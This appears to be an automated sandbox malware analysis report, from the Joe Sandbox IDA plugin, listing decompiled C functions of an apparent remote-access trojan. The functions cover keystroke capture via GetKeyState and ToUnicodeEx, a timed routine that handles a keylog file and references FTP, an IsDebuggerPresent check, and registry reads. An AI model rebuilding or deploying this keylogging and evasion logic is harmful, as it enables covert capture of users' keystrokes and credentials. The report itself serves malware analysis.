					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c858c2
0x00c858c9
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85917, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85917(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860b8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85917
0x00c8591e
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C859C1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859C1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86160);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c859c1
0x00c859c8
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C858F5, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858F5(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860a8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c858f5
0x00c858fc
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C87614, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
filesleep

C-Code - Quality: 100%

			E00C87614() {
				char _v516;
				intOrPtr _t8;
				intOrPtr _t19;
				void* _t23;
				void* _t25;
				short* _t29;
				char _t30;
				short _t32;
				void* _t35;
				void* _t38;
				void* _t39;

				while(1) {
					_t30 = 0;
					do {
						L2:
						Sleep(0x3e8);
						_t30 = _t30 + 1;
						_t8 =  *0xc8db94; // 0x0
					} while (_t30 < (_t8 + 1 + (_t8 + 1) * 4) * 0x3c);
					L3:
					if( *0xc8dee8 == 0) {
						do {
							_t30 = 0;
							goto L2;
						} while ( *0xc8dee8 == 0);
					}
					E00C8291C();
					E00C86890( &_v516);
					_t35 = E00C82E48( &_v516) - 1;
					if(_t35 < 0) {
						L13:
						_t19 =  *0xc8dec8; // 0x0
						if(E00C873E0(0xc8da4c, E00C833A8(_t19, 0xc8773c, _t46), 0xc8da9e, 0xc8db42, 0xc8daf0,  &_v516) != 0 &&  *0xc8db98 == 1 &&  *0xc8da4b == 1) {
							_t23 =  *0xc8dee8; // 0x0
							SetFilePointer(_t23, 0, 0, 0);
							_t25 =  *0xc8dee8; // 0x0
							SetEndOfFile(_t25);
							 *0xc8b0c8 = 0;
							 *0xc8b0cc = 0;
							E00C853EC(0, _t30, _t39);
						}
						continue;
					} else {
						_t38 = _t35 + 1;
						_t29 =  &_v516;
						do {
							_t32 =  *_t29;
							if(_t32 != 0x3a) {
								__eflags = _t32 - 0x2f;
								if(__eflags != 0) {
									__eflags = _t32 - 0x20;
									if(__eflags == 0) {
										 *_t29 = 0x2d;
									}
								} else {
									 *_t29 = 0x2e;
								}
							} else {
								 *_t29 = 0x2e;
							}
							_t29 = _t29 + 2;
							_t38 = _t38 - 1;
							_t46 = _t38;
						} while (_t38 != 0);
						goto L13;
					}
				}
			}

0x00c8761e
0x00c8761e
0x00c87620
0x00c87620
0x00c87625
0x00c8762a
0x00c8762b
0x00c87637
0x00c8763b
0x00c87642
0x00c8761e
0x00c8761e
0x00000000
0x00c8761e
0x00c8761e
0x00c8764f
0x00c8765a
0x00c8766c
0x00c8766f
0x00c876a6
0x00c876bc
0x00c876d9
0x00c876ff
0x00c87705
0x00c8770a
0x00c87710
0x00c87715
0x00c8771f
0x00c8772b
0x00c8772b
0x00000000
0x00c87671
0x00c87671
0x00c87672
0x00c87678
0x00c87678
0x00c8767f
0x00c87688
0x00c8768c
0x00c87695
0x00c87699
0x00c8769b
0x00c8769b
0x00c8768e
0x00c8768e
0x00c8768e
0x00c87681
0x00c87681
0x00c87681
0x00c876a0
0x00c876a3
0x00c876a3
0x00c876a3
0x00000000
0x00c87678
0x00c8766f

APIs

Sleep.KERNEL32(000003E8), ref: 00C87625

Part of subcall function 00C86890: GetLocalTime.KERNEL32 ref: 00C86897
Part of subcall function 00C86890: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,?,000000FF), ref: 00C868B0
Part of subcall function 00C86890: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C868E0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C873E0: GetFileSize.KERNEL32(00000000,00000000), ref: 00C87417
Part of subcall function 00C873E0: SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C874D7
Part of subcall function 00C873E0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C874EC
Part of subcall function 00C873E0: VirtualAlloc.KERNEL32(00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C87506
Part of subcall function 00C873E0: ReadFile.KERNEL32(00000000,?,-00C8B0C8,?,00000000), ref: 00C87525
Part of subcall function 00C873E0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000), ref: 00C87536
Part of subcall function 00C873E0: SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C8754B
Part of subcall function 00C873E0: SetFileAttributesW.KERNEL32(?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000), ref: 00C87556
Part of subcall function 00C873E0: DeleteFileW.KERNEL32(?,?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000), ref: 00C8755C
Part of subcall function 00C873E0: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00C87571
Part of subcall function 00C873E0: WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000), ref: 00C87592
Part of subcall function 00C873E0: VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 00C875BB
Part of subcall function 00C873E0: CloseHandle.KERNEL32(00000000), ref: 00C875C1
Part of subcall function 00C873E0: DeleteFileW.KERNEL32(?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,00000000), ref: 00C87602

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8DB42,00C8DAF0,?,000003E8), ref: 00C87705
SetEndOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00C8DB42,00C8DAF0,?,000003E8), ref: 00C87710

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Strings

FTP, xrefs: 00C876B7

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8861C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25
library

C-Code - Quality: 58%

			E00C8861C() {
				void* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;

				_t5 = 0;
				_t6 = LoadLibraryA("kernel32.dll");
				if(_t6 != 0) {
					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
					_t7 = _t8;
					if(_t8 != 0) {
						_t5 =  *_t7();
					}
				}
				return _t5;
			}

0x00c88620
0x00c8862c
0x00c88630
0x00c8863d
0x00c8863f
0x00c88643
0x00c88647
0x00c88647
0x00c88643
0x00c8864f

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88627
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent,kernel32.dll,?,00C8E07C,?,00000000,00C886B8,?,00C88A28), ref: 00C88638

Strings

kernel32.dll, xrefs: 00C88622
IsDebuggerPresent, xrefs: 00C88632

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C82E70, Relevance: 6.1, APIs: 4, Instructions: 96
registry

C-Code - Quality: 74%

			E00C82E70(void* __eax, void* __ebx, char __ecx, char __edx, void* __esi, intOrPtr* _a4, char _a8) {
				char _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				intOrPtr _t72;
				signed int _t77;
				void* _t79;
				short* _t80;
				void* _t83;
				long _t86;

				_v12 = __ecx;
				_v8 = __edx;
				_t79 = __eax;
				_t63 = _a4;
				E00C81FB0( &_v8);
				E00C81FB0( &_v12);
				E00C81FB0( &_a8);
				_push(_t83);
				_push(0xc82f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffec;
				E00C81BB4(_a4, _a8);
				if(RegOpenKeyExW(_t79, E00C81CF4(_v8), 0, 1,  &_v16) == 0) {
					_t80 = E00C81CF4(_v12);
					_t86 = RegQueryValueExW(_v16, _t80, 0,  &_v20, 0,  &_v24);
					if(_t86 == 0) {
						_t77 = _v24 >> 1;
						if(_t86 < 0) {
							asm("adc edx, 0x0");
						}
						E00C81F6C(_t63, _t77);
